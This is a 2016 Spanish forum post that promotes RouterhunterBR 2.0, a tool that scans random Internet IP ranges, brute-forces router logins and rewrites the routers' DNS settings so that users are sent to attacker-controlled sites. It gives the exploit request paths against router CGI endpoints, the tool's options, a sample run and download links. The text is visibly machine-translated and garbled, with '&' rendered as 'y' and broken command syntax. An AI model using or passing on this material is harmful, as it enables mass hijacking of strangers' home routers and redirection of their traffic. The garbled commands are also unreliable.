elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Informática
| |-+  Software
| | |-+  Routerhunterbr 2.0 vulnerabilidades de pruebas en dispositivos y routers
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Routerhunterbr 2.0 vulnerabilidades de pruebas en dispositivos y routers  (Leído 119 veces)
El_Andaluz


Desconectado Desconectado

Mensajes: 3.267



Ver Perfil
Routerhunterbr 2.0 vulnerabilidades de pruebas en dispositivos y routers
« en: 15 Febrero 2016, 05:02 am »


El RouterhunterBR es una herramienta de seguridad automatizada. Que encuentra vulnerabilidades y realiza pruebas en los routers y dispositivos vulnerables en Internet. El RouterhunterBR fue diseñado para funcionar a través de Internet en busca de pistas ips definidos o al azar con el fin de explotar la vulnerabilidad de forma automática DNSChanger en routers domésticos.

El DNSChanger es un troyano capaz de dirigir las peticiones del usuario a ilegales sitios. En la práctica , este programa malicioso capacidad de cambiar la configuración de DNS de nuestra máquina de redirigir al usuario a sitios con fines maliciosos . Imagínese , por ejemplo, que su sistema está infectado con este malware , lo que podría ocurrir es que el usuario para acceder a un determinado sitio (por ejemplo . Facebook.com ) puede ser remitido a una oferta no solicitada sitio web y potencialmente ilegal.

AUTOR: Jhonathan Davi A.K.A jh00nbr

EMAIL*: jhoonbr@protonmail.ch
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/jh00nbr
Facebook: https://fb.com/JhonVipNet
Fanpage: https://fb.com/InurlBrasil
Github: https://github.com/jh00nbr/
Youtube: http://www.youtube.com/c/Mrsinisterboy

Obtiene:
Código:
/ Dnscfg.cgi ? DnsPrimary = 8.8.8.8 y dnsSecondary = 8.8.4.4 y dnsDynamic = 0 & dnsRefresh = 1 "

/ Dnscfg.cgi ? DnsSecondary = 8.8.8.8 y dnsIfcsList = & dnsRefresh = 1 "

/ Dnscfg.cgi ? DnsPrimary = 8.8.8.8 y dnsSecondary = 8.8.4.4 y dnsDynamic = 0 & dnsRefresh = 1 & dnsIfcsList = "

/ Dnscfg.cgi ? DnsSecondary = 8.8.4.4 y dnsDynamic = 0 & dnsRefresh = 1 "

/ dns_1? Enable_DNSFollowing = 1 & dnsPrimary = 8.8.8.8 y dnsSecondary = 8.8.4.4

/ ddnsmngr.cmd?action=apply&service=0&enbl=0 & dnsPrimary= 8.8.8.8 & dnsSecondary= 8.8.4.4 &dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP”

INSTALACIÓN:

-range   201.12.50.0-255
volveremos a poner un IP gama que va a ser escaneado

-bruteforce
Fuerza bruta con usuarios y contraseñas en los routers que requiere autenticación, obligando a la alteración de DNS.

 -startip / -endip
Puede personalizar el IP de gama con un comodín / Ejemplo: -startip 201. * . * . * -endip 201. * . * . *

-dns1 8.8.8.8 / -dns2 8.8.4.4 Servidor primario y secundario DNS malicioso , que la ira está escuchando las peticiones y se realice la redirección de páginas

-threads 10
Numeración Los hilos

-randomip
Asignaron al azar a los routers ips

  -limitip 10
Definir IP al azar limite


La explotación de la demostración de:

ips al azar:

 pitón routerhunter.py -dns1 8.8.8.8 -dns2 8.8.4.4 -randomip -limitip 10 10 -threads


Link de Descarga.

GitHub:
https://github.com/jh00nbr/

Mas Información: https://jh00nsec.wordpress.com/2016/01/22/routerhunterbr-2-0-testing-vulnerabilities-in-devices-and-routers-connected-to-the-internet-dnschanger/


« Última modificación: 15 Febrero 2016, 05:04 am por El_Andaluz » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines